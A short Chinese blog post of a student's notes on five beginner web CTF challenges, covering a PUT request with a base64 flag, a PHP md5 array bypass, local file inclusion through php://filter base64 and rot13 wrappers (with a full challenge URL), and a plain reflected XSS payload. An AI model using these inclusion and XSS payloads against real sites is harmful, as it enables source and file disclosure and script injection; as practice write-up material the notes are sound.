CTF-1-5题笔记

CTF-1-5题笔记

POST

put me a message

ZmxhZ3twdXRfcmVxdWVzdHVoMjEyMzJ9 base64解码

 

F12

查看页面源代码和请求包头拼凑成flag

Code~md5

得到php代码 输入参数v1[]=1&&v2[]=2&&v3[]

得到flag

Include

重点难点对我而言

查看include1.php

 

构造伪协议

php://filter/read=convert.base64-encode/resource=include1(//注意不用加后缀.php)

解码知道include1过滤了flag,但有提示include2

再重新看include2解码发现没有过滤flag

构造伪协议 但要用rot13并且是include2下而非include1

php://filter/read=string.rot13/resource=flag

得到flag

 

 

http://192.144.182.32:8001/abf20c91a442da48/2/include2.php?file=php://filter/read=string.rot13/resource=flag

 

XSS

这个好像没有设置过滤,直接输入"><script>alert('XSS');</script>就绕过了

获得Key

Md5解码

 

"><script>alert('XSS');</script>

 

进行md5解密

 

心得:通过做题更加深刻理解这些方法。今天搞了好久第六题没搞懂啊,各种大小写,双写,畸形,.htaccess还是不行啊,提示没搞懂,靠。黑名单我特么都搞不来,菜!!!

posted @ 2020-06-24 23:39  Dorgan_Chen  阅读(835)  评论(0编辑  收藏  举报